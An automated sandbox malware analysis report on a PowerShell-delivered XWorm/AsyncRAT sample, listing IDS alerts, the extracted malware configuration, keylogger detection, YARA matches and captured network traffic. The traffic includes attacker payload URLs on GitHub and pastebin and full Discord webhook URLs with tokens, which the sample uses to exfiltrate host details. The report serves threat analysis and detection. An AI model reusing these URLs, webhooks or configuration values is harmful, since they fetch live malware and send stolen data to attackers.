Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", ProcessId: 4700, ProcessName: csc.exe

Suricata IDS alerts:

Timestamp                       | SID     | Severity | Classtype                     | Source IP   | Src port | Destination IP  | Dst port | Protocol
2024-10-15T15:54:04.138632+0200 | 2857658 | 1        | A Network Trojan was detected | 192.168.2.9 | 49712    | 162.159.138.232 | 443      | TCP
2024-10-15T15:54:18.466022+0200 | 2857659 | 1        | A Network Trojan was detected | 192.168.2.9 | 49722    | 162.159.138.232 | 443      | TCP
2024-10-15T15:54:25.976667+0200 | 2857659 | 1        | A Network Trojan was detected | 192.168.2.9 | 49723    | 162.159.138.232 | 443      | TCP
2024-10-15T15:54:33.914799+0200 | 2803305 | 3        | Unknown Traffic               | 192.168.2.9 | 49725    | 104.20.3.235    | 443      | TCP

AV Detection

Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/zNCj2Utm", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack | String decryptor: https://pastebin.com/raw/zNCj2Utm
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack | String decryptor: <123456789>
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack | String decryptor: <Xwormmm>
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack | String decryptor: XWorm V5.2
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack | String decryptor: USB.exe
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49724 version: TLS 1.2
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.pdbhP | source: powershell.exe, 00000001.00000002.1897623908.0000020A9BC1D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pDB | source: powershell.exe, 00000001.00000002.1929630337.0000020AB294E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.pdb | source: powershell.exe, 00000001.00000002.1897623908.0000020A9BC1D000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user

Networking

Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49722 -> 162.159.138.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49723 -> 162.159.138.232:443
Source: Network traffic | Suricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.9:49712 -> 162.159.138.232:443
Source: Malware configuration extractor | URLs: https://pastebin.com/raw/zNCj2Utm
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: pastebin.com
Source: Yara match | File source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected: GET /raw/zNCj2Utm HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/6db99fAK HTTP/1.1 | Host: pastebin.com
Source: Joe Sandbox View | IP Address: 104.20.3.235
Source: Joe Sandbox View | IP Address: 172.67.19.24
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49725 -> 104.20.3.235:443
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-CaU9vyM9tnzyvVTAKfrFOSG HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 214 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 295 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 295 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: global traffic | HTTP traffic detected: GET /raw/zNCj2Utm HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /raw/6db99fAK HTTP/1.1 Host: pastebin.com
              Source: global traffic | DNS traffic detected: DNS query: pastebin.com
              Source: global traffic | DNS traffic detected: DNS query: discord.com
              Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
              Source: unknown | HTTP traffic detected: POST /api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-CaU9vyM9tnzyvVTAKfrFOSG HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/json Host: discord.com Content-Length: 214 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 15 Oct 2024 13:54:04 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1729000445 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEtpHLoB0j6E8hurvYYTiMNQi%2B1fg6KkcpNeYpMpChEZslaumo84f8Lhcx3Us24g0K%2FRZBvyo6eEiRTtgxjXH0nXZS4yEyuQu5qjpmYFI2D7qD2BAp%2F30LUjGjim"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=e5481effafbe83c674b6e60947d49a354db44d76-1729000444; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=O2791xR3gowCquLJm3YPQJlFHPawLttdxQ93ZxTPnIA-1729000444058-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8d304c862a3a2e79-DFW {"message": "Unknown Webhook", "code": 10015}
              Source: powershell.exe, 0000000D.00000002.2817477632.000001E877C30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microW
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9AB67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
              Source: powershell.exe, 0000000A.00000002.2086833064.000002732873A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
              Source: powershell.exe, 0000000A.00000002.2086833064.000002732873A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.ctain
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA6A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AF28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AC54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AF0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86082B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E860856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
              Source: powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AFA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AFD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
              Source: powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F7A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A545000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880084000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1927649993.0000020AB2720000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2130172038.0000027342761000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.discor
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.discord.com/
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A50C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A4F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.000001888005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.000001888004A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/128545359042878
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732B06C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880B8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
              Source: powershell.exe, 00000014.00000002.2161624477.0000018880B8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9AB62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9A715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9AB67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp, cr_asm_hiddenz.ps1 | String found in binary or memory: https://discord.com/api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-Ca
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9B58C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A9BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA6A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86082B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86081F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/6db99fAK
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AF0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/sA04Mwk2
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E86081F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/zNCj2Utm
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86081F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/zNCj2Utm8e
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AFD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A715000.00000004.00000800.00020000.00000000.sdmp, cr_asm_hiddenz.ps1 | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AF4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AF28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F8B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49724 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout

System Summary

Source: amsi64_4860.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_5812.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE | Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE | Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 316, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4860, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FF887CDE7E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FF887CDF592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF887CDC722
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF887CDB976
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF887CE7E77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FF887CDDEE2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FF887CDD136
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FF887CD94F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FF887CDF622
Source: amsi64_4860.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
